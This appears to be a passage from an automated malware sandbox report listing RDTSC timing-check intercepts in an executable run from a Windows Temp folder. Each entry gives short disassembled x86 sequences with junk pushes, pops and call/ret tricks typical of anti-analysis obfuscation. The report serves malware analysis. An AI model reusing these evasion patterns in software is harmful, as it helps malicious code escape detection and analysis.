                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C5BD4 second address: 6C5BE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F69D121AB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6821F5 second address: 6821F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C623B second address: 6C6241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C6241 second address: 6C6245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C6245 second address: 6C62BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D34D6h], eax 0x00000014 mov dword ptr [ebp+1245301Dh], ebx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F69D121AB28h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 sub edi, 0CF43F7Ch 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edi 0x00000041 call 00007F69D121AB28h 0x00000046 pop edi 0x00000047 mov dword ptr [esp+04h], edi 0x0000004b add dword ptr [esp+04h], 00000018h 0x00000053 inc edi 0x00000054 push edi 0x00000055 ret 0x00000056 pop edi 0x00000057 ret 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jng 00007F69D121AB26h 0x00000062 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C76C3 second address: 6C76DC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F69D1080A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F69D1080A46h 0x00000019 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C6BE3 second address: 6C6BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C8D46 second address: 6C8D4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CCD4D second address: 6CCD65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F69D121AB26h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CCD65 second address: 6CCD7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F69D1080A46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F69D1080A46h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C9704 second address: 6C971C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6C971C second address: 6C9722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CEE56 second address: 6CEEBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jl 00007F69D121AB2Ch 0x0000000f xor dword ptr [ebp+122D3086h], ecx 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+122D2CAAh], edi 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F69D121AB28h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 xchg eax, esi 0x0000003a jmp 00007F69D121AB33h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 jnp 00007F69D121AB26h 0x00000049 jp 00007F69D121AB26h 0x0000004f popad 0x00000050 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CEEBB second address: 6CEEC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CEEC1 second address: 6CEEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CEEC5 second address: 6CEEC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CFDC0 second address: 6CFE10 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F69D121AB2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c xor dword ptr [ebp+1245116Bh], eax 0x00000012 mov dword ptr [ebp+122D2FD5h], eax 0x00000018 popad 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D35A9h], edx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007F69D121AB28h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000019h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 pop eax 0x00000043 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CFE10 second address: 6CFE14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CFE14 second address: 6CFE1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6D0F02 second address: 6D0F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D1080A4Ah 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CFFD8 second address: 6CFFE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6D0F10 second address: 6D0F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6CFFE2 second address: 6D0054 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F69D121AB28h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007F69D121AB28h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 mov dword ptr fs:[00000000h], esp 0x0000004e jo 00007F69D121AB28h 0x00000054 mov ebx, edx 0x00000056 mov eax, dword ptr [ebp+122D1745h] 0x0000005c mov ebx, esi 0x0000005e push FFFFFFFFh 0x00000060 sub dword ptr [ebp+12466037h], edx 0x00000066 push eax 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push edi 0x0000006b pop edi 0x0000006c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6D1EE1 second address: 6D1EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6D1EE5 second address: 6D1EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6D1EE9 second address: 6D1F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F69D1080A4Fh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F69D1080A52h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6D1F16 second address: 6D1F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 nop 0x00000007 call 00007F69D121AB2Ch 0x0000000c mov ebx, dword ptr [ebp+122D2AA4h] 0x00000012 pop edi 0x00000013 push 00000000h 0x00000015 jp 00007F69D121AB32h 0x0000001b mov di, 98B8h 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+122D1ACBh] 0x00000027 push eax 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6D11D6 second address: 6D11E0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F69D1080A46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6D312E second address: 6D3134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6D85DD second address: 6D85E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6D9616 second address: 6D96A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push ecx 0x00000008 jns 00007F69D121AB26h 0x0000000e pop ecx 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F69D121AB28h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jmp 00007F69D121AB32h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F69D121AB28h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+12447883h] 0x00000054 movzx ebx, bx 0x00000057 push 00000000h 0x00000059 jno 00007F69D121AB2Ch 0x0000005f push eax 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 jo 00007F69D121AB26h 0x00000069 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6DA7E9 second address: 6DA806 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6DA806 second address: 6DA818 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 je 00007F69D121AB2Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6DB8E8 second address: 6DB8EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6DE943 second address: 6DE9B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 jno 00007F69D121AB2Ch 0x0000000f pop eax 0x00000010 nop 0x00000011 sub dword ptr [ebp+12452A61h], eax 0x00000017 sub dword ptr [ebp+122D36EAh], eax 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F69D121AB28h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000016h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F69D121AB28h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 adc ebx, 618DB291h 0x0000005b push eax 0x0000005c jo 00007F69D121AB34h 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6DE9B6 second address: 6DE9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6E1E11 second address: 6E1E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F69D121AB26h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F69D121AB36h 0x00000013 popad 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6E1E36 second address: 6E1E54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A56h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6E32C6 second address: 6E32E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F69D121AB34h 0x0000000d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6D87F9 second address: 6D8886 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F69D1080A4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ebx, dword ptr [ebp+122D2AA0h] 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F69D1080A48h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 cmc 0x0000003a mov eax, dword ptr [ebp+122D05D5h] 0x00000040 push 00000000h 0x00000042 push esi 0x00000043 call 00007F69D1080A48h 0x00000048 pop esi 0x00000049 mov dword ptr [esp+04h], esi 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc esi 0x00000056 push esi 0x00000057 ret 0x00000058 pop esi 0x00000059 ret 0x0000005a mov ebx, esi 0x0000005c push FFFFFFFFh 0x0000005e or dword ptr [ebp+1247009Fh], eax 0x00000064 nop 0x00000065 push edx 0x00000066 jl 00007F69D1080A48h 0x0000006c pushad 0x0000006d popad 0x0000006e pop edx 0x0000006f push eax 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F69D1080A4Ah 0x00000078 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6DA919 second address: 6DA91F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6DA91F second address: 6DA923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6DBB4E second address: 6DBB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6DCB1C second address: 6DCB20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6DCBD9 second address: 6DCBDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6E8E2E second address: 6E8E4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F69D1080A57h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6E8F8B second address: 6E8F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6E8F92 second address: 6E8FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F69D1080A46h 0x0000000a jng 00007F69D1080A46h 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6E9153 second address: 6E9159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6E9159 second address: 6E915D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 67EBC6 second address: 67EBE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D121AB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007F69D121AB26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 67EBE4 second address: 67EBFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F69D1080A54h 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 67EBFF second address: 67EC03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 67EC03 second address: 67EC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F69D1080A51h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F69D1080A4Eh 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 js 00007F69D1080A46h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F0094 second address: 6F00E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F69D121AB39h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F69D121AB30h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 jmp 00007F69D121AB38h 0x0000001e pop edx 0x0000001f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F01F8 second address: 6F0229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F69D1080A54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jmp 00007F69D1080A4Dh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 pop edx 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F0229 second address: 6F0243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F69D121AB26h 0x00000009 jng 00007F69D121AB26h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F0243 second address: 6F0247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F0247 second address: 6F0251 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F69D121AB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F03EB second address: 6F03FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F3D77 second address: 6F3D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F69D121AB2Fh 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F4512 second address: 6F452A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F69D1080A4Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F452A second address: 6F4532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F4532 second address: 6F4537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F4537 second address: 6F4550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F69D121AB35h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F4C04 second address: 6F4C08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F4C08 second address: 6F4C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F69D121AB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F4C14 second address: 6F4C19 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F4D8B second address: 6F4D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exeRDTSC instruction interceptor: First address: 6F4D91 second address: 6F4D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
